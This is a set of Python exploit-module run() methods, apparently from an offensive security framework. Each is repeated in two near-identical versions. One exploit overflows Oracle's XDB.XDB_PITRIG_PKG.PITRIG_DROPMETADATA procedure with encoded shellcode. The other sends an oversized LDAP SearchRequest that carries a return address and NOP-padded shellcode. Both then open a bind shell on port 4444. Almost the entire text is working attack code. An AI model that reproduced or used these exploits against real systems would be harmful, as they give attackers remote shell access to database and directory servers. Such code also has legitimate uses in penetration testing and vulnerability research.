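    def run(self):
        """Exploit the XDB.XDB_PITRIG_PKG.PITRIG_DROPMETADATA overflow.

        Fills in defaults for any unset option (target, port, ostype, sid,
        payload, listenPort), logs into the target database as
        self.user/self.password, calls PITRIG_DROPMETADATA with oversized
        OWNER/NAME arguments that carry the encoded shellcode, then hands
        the listen port to spawnTerminal().

        Returns True after spawnTerminal() returns.  Raises ValueError when
        the encoded shellcode does not fit the fixed slot; cx_Oracle errors
        from connect()/execute() propagate to the caller.
        """
        if self.target == "" or self.target is None:
            self.target = "localhost"

        if self.port == 0 or self.port is None:
            self.port = 1521

        if self.ostype < 1:
            self.gom.echo("[+] No OS selected. Using Linux (ostype = 1)")
            self.ostype = 1

        # Treat None like "" so a missing sid never becomes the literal
        # string "None" inside the connect descriptor.
        if not self.sid:
            self.gom.echo("[+] No sid selected, using ORCL")
            self.sid = "ORCL"

        if self.payload < 1:
            self.gom.echo(
                "[+] No payload selected. Using 'bindshell' (payload = 2)")
            self.payload = 2

        if self.listenPort == 0:
            self.gom.echo("[+] No listen port selected, using 4444")
            self.listenPort = 4444

        # Build the payload before touching the target so a shellcode that
        # does not fit fails here instead of after authenticating.
        adjustSize = 506
        sc = getShellcode("0.0.0.0", self.listenPort, self.ostype,
                          self.payload)
        sc = x86XorEncode(sc)
        self.gom.echo("[+] Len of encoded shellcode is", len(sc))
        if len(sc) > adjustSize:
            # Without this check the padding below silently becomes "" and
            # the buffer layout no longer matches the overflow.
            raise ValueError(
                "encoded shellcode is %d bytes, larger than the %d-byte slot"
                % (len(sc), adjustSize))
        # Left-pad with 0x27 to exactly adjustSize bytes.
        sc = chr(0x27) * (adjustSize - len(sc)) + sc

        addr = "BBBB"
        data = sc
        data += addr
        # Kept as in the original.  NOTE(review): len(data) - 1024 is
        # negative for the 510-byte buffer built above, so the trailing
        # "\x27" run is empty and data is simply doubled (1020 bytes);
        # confirm this matches the intended overflow layout.
        data += data + "\x27" * (len(data) - 1024)

        descriptor = (
            "(DESCRIPTION=(ADDRESS_LIST=(ADDRESS=(PROTOCOL=TCP)(HOST=%s)(PORT=%d)))"
            "(CONNECT_DATA=(SERVICE_NAME=%s)))"
            % (self.target, self.port, self.sid))
        link = "%s/%s@%s" % (self.user, self.password, descriptor)
        # Echo the descriptor without the password: this line ends up in
        # console logs and session captures.
        self.gom.echo("%s/***@%s" % (self.user, descriptor))

        connection = cx_Oracle.connect(link)
        try:
            connection.rollback()
            connection.commit()
            cur = connection.cursor()
            cur.execute(
                "BEGIN XDB.XDB_PITRIG_PKG.PITRIG_DROPMETADATA(OWNER=>:1,NAME=>:2); END;",
                (data, data))
        finally:
            # Best-effort cleanup: once the overflow fires the server side
            # of this session is usually gone and close() can fail itself,
            # which must not abort the connect to the shell below.
            try:
                connection.close()
            except Exception:
                pass

        self.gom.echo("[+] Exploit sended. Connecting to port",
                      self.listenPort)
        time.sleep(3)
        # NOTE(review): this connects to localhost, which only reaches a
        # bind shell listening on the target when target is the local host
        # (the default); confirm whether self.target was intended here.
        spawnTerminal("localhost", self.listenPort)

        return True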
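    def run(self):
        """Exploit the XDB.XDB_PITRIG_PKG.PITRIG_DROPMETADATA overflow.

        Fills in defaults for any unset option (target, port, ostype, sid,
        payload, listenPort), logs into the target database as
        self.user/self.password, calls PITRIG_DROPMETADATA with oversized
        OWNER/NAME arguments that carry the encoded shellcode, then hands
        the listen port to spawnTerminal().

        Returns True after spawnTerminal() returns.  Raises ValueError when
        the encoded shellcode does not fit the fixed slot; cx_Oracle errors
        from connect()/execute() propagate to the caller.
        """
        if self.target == "" or self.target is None:
            self.target = "localhost"

        if self.port == 0 or self.port is None:
            self.port = 1521

        if self.ostype < 1:
            print "[+] No OS selected. Using Linux (ostype = 1)"
            self.ostype = 1

        # Treat None like "" so a missing sid never becomes the literal
        # string "None" inside the connect descriptor.
        if not self.sid:
            print "[+] No sid selected, using ORCL"
            self.sid = "ORCL"

        if self.payload < 1:
            print "[+] No payload selected. Using 'bindshell' (payload = 2)"
            self.payload = 2

        if self.listenPort == 0:
            print "[+] No listen port selected, using 4444"
            self.listenPort = 4444

        # Build the payload before touching the target so a shellcode that
        # does not fit fails here instead of after authenticating.
        adjustSize = 506
        sc = getShellcode("0.0.0.0", self.listenPort, self.ostype, self.payload)
        sc = x86XorEncode(sc)
        print "[+] Len of encoded shellcode is", len(sc)
        if len(sc) > adjustSize:
            # Without this check the padding below silently becomes "" and
            # the buffer layout no longer matches the overflow.
            raise ValueError(
                "encoded shellcode is %d bytes, larger than the %d-byte slot"
                % (len(sc), adjustSize))
        # Left-pad with 0x27 to exactly adjustSize bytes.
        sc = chr(0x27) * (adjustSize - len(sc)) + sc

        addr = "BBBB"
        data = sc
        data += addr
        # Kept as in the original.  NOTE(review): len(data) - 1024 is
        # negative for the 510-byte buffer built above, so the trailing
        # "\x27" run is empty and data is simply doubled (1020 bytes);
        # confirm this matches the intended overflow layout.
        data += data + "\x27" * (len(data) - 1024)

        descriptor = (
            "(DESCRIPTION=(ADDRESS_LIST=(ADDRESS=(PROTOCOL=TCP)(HOST=%s)(PORT=%d)))"
            "(CONNECT_DATA=(SERVICE_NAME=%s)))"
            % (self.target, self.port, self.sid)
        )
        link = "%s/%s@%s" % (self.user, self.password, descriptor)
        # Print the descriptor without the password: this line ends up in
        # console logs and session captures.
        print "%s/***@%s" % (self.user, descriptor)

        connection = cx_Oracle.connect(link)
        try:
            connection.rollback()
            connection.commit()
            cur = connection.cursor()
            cur.execute("BEGIN XDB.XDB_PITRIG_PKG.PITRIG_DROPMETADATA(OWNER=>:1,NAME=>:2); END;", (data, data))
        finally:
            # Best-effort cleanup: once the overflow fires the server side
            # of this session is usually gone and close() can fail itself,
            # which must not abort the connect to the shell below.
            try:
                connection.close()
            except Exception:
                pass

        print "[+] Exploit sended. Connecting to port", self.listenPort
        time.sleep(3)
        # NOTE(review): this connects to localhost, which only reaches a
        # bind shell listening on the target when target is the local host
        # (the default); confirm whether self.target was intended here.
        spawnTerminal("localhost", self.listenPort)

        return True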
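    def run(self):
        """Send an oversized LDAP SearchRequest base DN carrying shellcode.

        Fills in defaults for any unset option (target, port, ostype,
        payload, listenPort), builds a fixed-size ``dc=`` base DN whose
        tail overwrites the return address with a JMP ESP in Debian's
        linux-gate.so (0xffffe777) and lands in the NOP-padded shellcode,
        sends the request over one TCP connection, then hands the listen
        port to spawnTerminal().

        Returns True after spawnTerminal() returns.  Raises ValueError when
        the encoded shellcode does not fit the frame; socket errors from
        connect()/sendall() propagate to the caller.
        """
        if self.target == "" or self.target is None:
            self.target = "localhost"

        if self.port == 0 or self.port is None:
            self.port = 389

        if self.ostype < 1:
            self.gom.echo("[+] No OS selected. Using Linux (ostype = 1)")
            self.ostype = 1

        if self.payload < 1:
            self.gom.echo(
                "[+] No payload selected. Using 'bindshell' (payload = 2)")
            self.payload = 2

        if self.listenPort == 0:
            self.gom.echo("[+] No listen port selected, using 4444")
            self.listenPort = 4444

        # Alphanumeric-encode the shellcode and left-pad it with NOPs to at
        # least adjustSize bytes.
        adjustSize = 243
        sc = getShellcode("0.0.0.0", self.listenPort, self.ostype,
                          self.payload)
        sc = x86AlphaEncode(sc)
        sc = "\x90" * (adjustSize - len(sc)) + sc

        #
        # The address we will use is 0xffffe777 (JMP ESP in Debian's linux-gate.so)
        #
        addr = "\x77\xe7\xff\xff"
        # Fixed frame: 2076 NOPs, the return address, then a slotSize-byte
        # slot holding the NOP-padded shellcode (4099 bytes in total).  The
        # BER length octets hard-coded in pkt below (0x102f, 0x1028, 0x1006)
        # encode exactly that size, so a shellcode larger than the slot
        # would make the padding empty and the request malformed.
        slotSize = 2019
        if len(sc) > slotSize:
            raise ValueError(
                "encoded shellcode is %d bytes, larger than the %d-byte slot"
                % (len(sc), slotSize))
        theLine = '\x90' * 2076 + addr + '\x90' * (slotSize - len(sc)) + sc

        pkt = '0\x82\x10/\x02\x01\x01c\x82\x10(\x04\x82\x10\x06dc='
        pkt += theLine
        pkt += '\n\x01\x02\n\x01\x00\x02\x01\x00\x02\x01\x00\x01\x01\x00\x87\x0bobjectClass0\x00'

        # Process-wide default, kept from the original so later sockets
        # (e.g. the one spawnTerminal opens) keep the same timeout.
        socket.setdefaulttimeout(self.timeout)
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        try:
            s.connect((self.target, self.port))
            # sendall(): send() may return after a partial write on a ~4 KB
            # buffer, and a truncated request never reaches the overflow.
            s.sendall(pkt)
        finally:
            # Close on the error path too, not only after a successful send.
            s.close()

        self.gom.echo("[+] Exploit sended. Connecting to port",
                      self.listenPort)
        time.sleep(3)
        # NOTE(review): this connects to localhost, which only reaches a
        # bind shell listening on the target when target is the local host
        # (the default); confirm whether self.target was intended here.
        spawnTerminal("localhost", self.listenPort)

        return True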
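    def run(self):
        """Send an oversized LDAP SearchRequest base DN carrying shellcode.

        Fills in defaults for any unset option (target, port, ostype,
        payload, listenPort), builds a fixed-size ``dc=`` base DN whose
        tail overwrites the return address with a JMP ESP in Debian's
        linux-gate.so (0xffffe777) and lands in the NOP-padded shellcode,
        sends the request over one TCP connection, then hands the listen
        port to spawnTerminal().

        Returns True after spawnTerminal() returns.  Raises ValueError when
        the encoded shellcode does not fit the frame; socket errors from
        connect()/sendall() propagate to the caller.
        """
        if self.target == "" or self.target is None:
            self.target = "localhost"

        if self.port == 0 or self.port is None:
            self.port = 389

        if self.ostype < 1:
            print "[+] No OS selected. Using Linux (ostype = 1)"
            self.ostype = 1

        if self.payload < 1:
            print "[+] No payload selected. Using 'bindshell' (payload = 2)"
            self.payload = 2

        if self.listenPort == 0:
            print "[+] No listen port selected, using 4444"
            self.listenPort = 4444

        # Alphanumeric-encode the shellcode and left-pad it with NOPs to at
        # least adjustSize bytes.
        adjustSize = 243
        sc = getShellcode("0.0.0.0", self.listenPort, self.ostype, self.payload)
        sc = x86AlphaEncode(sc)
        sc = "\x90" * (adjustSize - len(sc)) + sc

        #
        # The address we will use is 0xffffe777 (JMP ESP in Debian's linux-gate.so)
        #
        addr = "\x77\xe7\xff\xff"
        # Fixed frame: 2076 NOPs, the return address, then a slotSize-byte
        # slot holding the NOP-padded shellcode (4099 bytes in total).  The
        # BER length octets hard-coded in pkt below (0x102f, 0x1028, 0x1006)
        # encode exactly that size, so a shellcode larger than the slot
        # would make the padding empty and the request malformed.
        slotSize = 2019
        if len(sc) > slotSize:
            raise ValueError(
                "encoded shellcode is %d bytes, larger than the %d-byte slot"
                % (len(sc), slotSize))
        theLine = '\x90' * 2076 + addr + '\x90' * (slotSize - len(sc)) + sc

        pkt = '0\x82\x10/\x02\x01\x01c\x82\x10(\x04\x82\x10\x06dc='
        pkt += theLine
        pkt += '\n\x01\x02\n\x01\x00\x02\x01\x00\x02\x01\x00\x01\x01\x00\x87\x0bobjectClass0\x00'

        # Process-wide default, kept from the original so later sockets
        # (e.g. the one spawnTerminal opens) keep the same timeout.
        socket.setdefaulttimeout(self.timeout)
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        try:
            s.connect((self.target, self.port))
            # sendall(): send() may return after a partial write on a ~4 KB
            # buffer, and a truncated request never reaches the overflow.
            s.sendall(pkt)
        finally:
            # Close on the error path too, not only after a successful send.
            s.close()

        print "[+] Exploit sended. Connecting to port", self.listenPort
        time.sleep(3)
        # NOTE(review): this connects to localhost, which only reaches a
        # bind shell listening on the target when target is the local host
        # (the default); confirm whether self.target was intended here.
        spawnTerminal("localhost", self.listenPort)

        return True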